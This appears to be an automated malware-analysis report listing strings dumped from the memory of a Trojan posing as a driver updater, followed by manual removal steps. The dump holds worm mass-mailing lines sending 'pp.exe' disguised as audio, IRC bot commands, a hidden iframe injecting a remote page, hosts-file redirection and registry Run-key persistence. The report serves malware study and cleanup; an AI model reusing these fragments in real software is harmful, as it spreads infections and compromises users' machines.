Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
unspecified error %d
23[^;=]=I99[^;
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
I99[^;
httponly
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s%s%s
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
%s:%s:%s
%s:%.*s
%s:%s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Internal error clearing splay node = %d
Internal error removing splay node = %d
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Failed to resolve "%s" for SOCKS4 connect.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
USER %s
STARTTLS denied. %c
Access denied. %c
PASS %s
RETR %s
LIST %s
POP3S not supported!
login
password
%s LOGIN %s %s
%s SELECT %s
%s FETCH 1 BODY[TEXT]
%s STARTTLS
%s LOGOUT
IMAPS not supported!
SMTP
LOGIN
EHLO %s
HELO %s
No known auth mechanisms supported!
AUTH %s %s
AUTH %s
Access denied: %d
%s xxxxxxxxxxxxxxxx
Authentication failed: %d
MAIL FROM:%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
SMTPS not supported!
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
Host: %s
CONNECT %s:%hu HTTP/%s
%s%s%s%s
HTTP/1.%d %d
Received HTTP code %d from proxy after CONNECT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
Could not resolve proxy: %s; %s
Could not resolve host: %s; %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds
%d.%d.%d.%d
Unsupported protocol
URL using bad/illegal format or missing URL
FTP: weird server reply
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with known CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized HTTP Content-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
d:d:d
d:d
%c%c==
%c%c%c=
%c%c%c%c
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Disposition: attachment; filename="%s"
; filename="%s"
Content-Type: %s
couldn't open file "%s"
--%s--
d:\DRPSuUpdater\bin\Release\DrvUpdater.pdb
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe
2/}'1~'0
GetProcessHeap
GetConsoleOutputCP
GetCPInfo
RegOpenKeyA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
ShellExecuteA
ShellExecuteExA
1<' 3'$%
.text
`.rdata
@.data
.rsrc
@.reloc
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1094721
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
info@drp.su0
hXXp://drp.su/0
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
C7%D(
[L\-j}
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
mscoree.dll
\DRPSu\DrvUpdater.exe
ntdll.dll
Windows
Windows has found a new device. Download and install a specific driver to enable the device.
<a>Use the Web service to download driver </a>
0, 0, 25, 0
DrvUpdater.exe
%original file name%.exe_3380_rwx_0046D000_0000B000:
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t
1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%
1094721
hXXps://secure.comodo.net/CPS0A
0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$
hXXp://ocsp.comodoca.com0
info@drp.su0
hXXp://drp.su/0
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
\runouce.exe
=.wabt!=.adct$=r.dbt
=.doct
=.xlst
=.exetS=.scrtL=.htmt
readme.eml
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoyirc.zief.pl
proxim.ircgalaxy.pl
NICK kqclujuk
SFC.DLL
SFC_OS.DLL
SHLWAPI.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
DrvUpdater.exe_812_rwx_00401000_00064000:
T$XRSShL$D
t%h(%D
DVPQRhh%D
E<h}%D
{4h}%D
O@It_ItSIt.It
D$<}%D
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
dhu2.iu
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
.jpeg
.html
0123456789
X;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
/DrvUpdater.xml
0.0.25
\DrvUpdater.Update
\DrvUpdater.Update.bat
ping -n 1 127.0.0.1
start /D "%APPDATA%\DRPSu" DrvUpdater.exe
copy /Y /B "%TEMP%\DrvUpdater.Update" "%APPDATA%\DRPSu\DrvUpdater.exe"
del /F "%TEMP%\DrvUpdater.Update"
del /F "%TEMP%\DrvUpdater.Update.bat
url.dll,FileProtocolHandler hXXp://devid.drp.su/?l=ru&down=updater&dev=
url.dll,FileProtocolHandler hXXp://devid.drp.su/?l=en&down=updater&dev=
\DrvUpdater.exe
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Uninstall\DRPSu Updater
hXXp://drp.su/
/DrvUpdater.Uninstall.bat
/DrvUpdater.Run.bat
hXXp://update.drp.su/drpupdater/DrvUpdater.xml
Rundll32.exe
WARNING: failed to save cookies in %s
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
Protocol %s not supported or disabled in libcurl
[^:]:%[^
:]://%[^
<url> malformed
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Re-using existing connection! (#%ld) with host %s
User-Agent: %s
Connection #%ld to host %s left intact
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Failed to connect to %s: %s
%s:%d
Send failure: %s
Recv failure: %s
[%s %s %s]
operation aborted by callback
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
HTTP server doesn't seem to support byte ranges. Cannot resume.
Received problem %d in the chunky parser
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
unspecified error %d
23[^;=]=I99[^;
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
I99[^;
httponly
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s%s%s
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
%s:%s:%s
%s:%.*s
%s:%s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Internal error clearing splay node = %d
Internal error removing splay node = %d
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Failed to resolve "%s" for SOCKS4 connect.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
USER %s
STARTTLS denied. %c
Access denied. %c
PASS %s
RETR %s
LIST %s
POP3S not supported!
login
password
%s LOGIN %s %s
%s SELECT %s
%s FETCH 1 BODY[TEXT]
%s STARTTLS
%s LOGOUT
IMAPS not supported!
SMTP
LOGIN
EHLO %s
HELO %s
No known auth mechanisms supported!
AUTH %s %s
AUTH %s
Access denied: %d
%s xxxxxxxxxxxxxxxx
Authentication failed: %d
MAIL FROM:%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
SMTPS not supported!
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
Host: %s
CONNECT %s:%hu HTTP/%s
%s%s%s%s
HTTP/1.%d %d
Received HTTP code %d from proxy after CONNECT
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
Could not resolve proxy: %s; %s
Could not resolve host: %s; %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Operation too slow. Less than %ld bytes/sec transfered the last %ld seconds
%d.%d.%d.%d
Unsupported protocol
URL using bad/illegal format or missing URL
FTP: weird server reply
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with known CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized HTTP Content-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
d:d:d
d:d
%c%c==
%c%c%c=
%c%c%c%c
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Disposition: attachment; filename="%s"
; filename="%s"
Content-Type: %s
couldn't open file "%s"
--%s--
d:\DRPSuUpdater\bin\Release\DrvUpdater.pdb
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe
2/}'1~'0
GetProcessHeap
GetConsoleOutputCP
GetCPInfo
RegOpenKeyA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
ShellExecuteA
ShellExecuteExA
1<' 3'$%
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
KERNEL32.DLL
\DRPSu\DrvUpdater.exe
ntdll.dll
Windows
Windows has found a new device. Download and install a specific driver to enable the device.
<a>Use the Web service to download driver </a>
%original file name%.exe_3380_rwx_00479000_00001000:
.idata
.reloc
KERNEL32.dll
DrvUpdater.exe_812_rwx_0046D000_00001000:
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
MSIMG32.dll
SETUPAPI.dll
SHELL32.dll
USER32.dll
WS2_32.dll
RegOpenKeyA
ShellExecuteA
hXXp://VVV.usertrust.com1
3hXXp://crl.usertrust.com/AddTrustExternalCARoot.crl05
hXXp://ocsp.usertrust.com0
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
DrvUpdater.exe_812_rwx_00470000_00001000:
btamail.net.cn
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO: %s
FROM: %s@yahoo.com
TO: %s
SUBJECT: %s is comming!
Content-Type: audio/x-wav; name="pp.exe"
.idata
.reloc
KERNEL32.dll
DrvUpdater.exe_812_rwx_00474000_00004000:
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
KERNEL32.dll
DrvUpdater.exe_812_rwx_00479000_00001000:
.idata
.reloc
KERNEL32.dll
Explorer.EXE_1440_rwx_01C50000_00001000:
C:\Windows\system32\runouce.exe
Explorer.EXE_1440_rwx_02D70000_00001000:
C:\Windows\system32\Serverx.exe
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3404
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DrvUpdater.xml (113 bytes)
C:\Windows\System32\Serverx.exe (1504988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DrvUpdater.Run.bat (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe (1281 bytes)
C:\Windows\System32\runouce.exe (1504988 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (2360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (2904 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DrvUpdater" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\DRPSu\DrvUpdater.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Serverx" = "C:\Windows\system32\Serverx.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Runonce" = "C:\Windows\system32\runouce.exe"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.